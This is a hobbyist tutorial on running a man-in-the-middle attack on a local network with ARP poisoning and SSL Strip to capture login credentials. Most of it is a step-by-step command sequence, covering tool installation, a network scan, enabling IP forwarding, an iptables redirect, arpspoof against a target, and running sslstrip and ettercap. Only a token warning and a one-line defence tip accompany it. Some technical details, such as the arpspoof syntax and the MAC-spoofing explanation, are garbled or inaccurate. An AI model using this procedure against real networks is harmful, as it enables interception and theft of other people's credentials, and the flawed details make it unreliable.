dvanced MAN-IN-THE-MIDDLE attack tutorial

By S3cur17y Fr43k5.

SSL stands for Secure Socket Layer. It's an encryption standard used on most sites'
login pages to avoid their users' passwords being packet sniffed in simple plain-
text format. This keeps the users safe by having all of that traffic encrypted over
an "https" connection. So, whenever you see "https://" in front of the URL in your
browser, you know you're safe... or are you?

I'm going to show you how to perform a MITM (Man-In-The-Middle) attack on someone
via ARP poisoning. ARP poisoning is a technique used to trick a client into
thinking that your computer is the router, and to forward all their traffic to you.
This allows you to sniff out all the traffic before sending it to the actual
router.

After that, we are going to strip the SSL layer as well, so you can intercept any
login, even logins "protected" by SSL. There is a new tool out called BEAST, which
decrypts SSL/TLS via an encryption flaw. However, we will be using Moxie
Marlinspike's SSL Strip which removes the SSL layer, but makes the connection
appear to be normal.
How SSL Strip Works
An attacker picks a target to attack. After, they spoof themselves to appear as the
wireless access point by making their Media Access Control (MAC) address identical
to the router's. While they appear to be the router, they send packets to the
client/target requesting their packets, thus creating a MITM topology.

The client then forwards requests to the attacker, and the attacker takes the
requests and retrieves them from the server for the client. After they recieve it,
the SSL layer gets stripped and the page is sent to the target. The victim then
forwards their packets to the attacker unknowingly, while their private information
is picked out of it. SSL Strip puts the SSL layer back on, fills it out, and sends
it to the server. Everything looks fine to the server and client, except the
attacker gets the information they desire.

This is going to be done using Linux, because Windows does not have wireless
drivers capable of going into monitor mode. I suggest trying this on yourself on a
home network, with two laptops and your friends.

Warnings
Don't perform this on people in public, this is a proof of concept to show you why
SSL is still vulnerable, and how you can protect yourself using a guide I published
previously. Do this on your home network, or you will get caught.
Step 1 Tools Needed for SSL Strip
The following tools can be found in any package repository:
dsniff
sslstrip
iptables
python
python-twisted
ettercap
wireshark
_____________________________________________
In Arch Linux, I do this command in a terminal to download and install them (Ubuntu
users, replace "pacman -S" with apt-get install"):

sudo pacman -S dsniff iptables python2 python-twisted ettercap wireshark

Now, download SSL Strip from Moxie, while following the install instructions on his
page.
Step 2 Sniffing Traffic (Non-HTTPS)
Get your wireless card into monitor mode, so you're capable of sniffing traffic.

sudo ifconfig wlan0 down && sudo ifconfig wlan0 mode monitor && sudo ifconfig wlan0
up

Now, run wireshark in a terminal to capture airborne packets.

sudo wireshark

Look in the packet information for usernames and passwords in hexadecimal

conversion.

Step 3 Sniffing Traffic (Using HTTPS)

When these commands are entered in the terminal, you need to leave them running, so
open a new tab or terminal for each running command.

First we need to scan the local network for our target IP. This means we are
pinging everyone on the local network and when we get replies, we can see their IP
and pick them as a target.

sudo nmap -sP 192.168.1.0/24

Make sure to paste your test computer's IP somewhere, maybe in a text document so
that you can paste in the commands later.

Next, we need to enable IP forwarding: (This allows you to forward traffic to/from
a client, port and interface that you specify.)

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Now we need to set up our interception. This tells your iptables that you want to
pre-route your incoming port 80 traffic (HTTP) to 1024, because this is where you
will be sniffing your traffic from.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

1024

It's time to ARP poison your second computer to make it send traffic to you.

sudo arpspoof -i [interface] -t [router ip, target ip]

Next we strip the SSL layer off our target, taking the encrypted layer off to be
forwarded to our victim (it even puts the favicon back on so it looks like it's
still HTTPS!). Change directories to wherever you saved SSL Strip before typing
this.

python sslstrip.py -l 1024

Finally, set up ettercap to capture traffic between you and the client.

sudo ettercap -Tq -i [interface]

Now, go log in to an SSL page, or tell your friend to log in to one, and you will
get their traffic. It's simple, and most of this could be tossed into a script for
fast attacking.

How Can I Defend Myself?

Don't use Wi-Fi you don't trust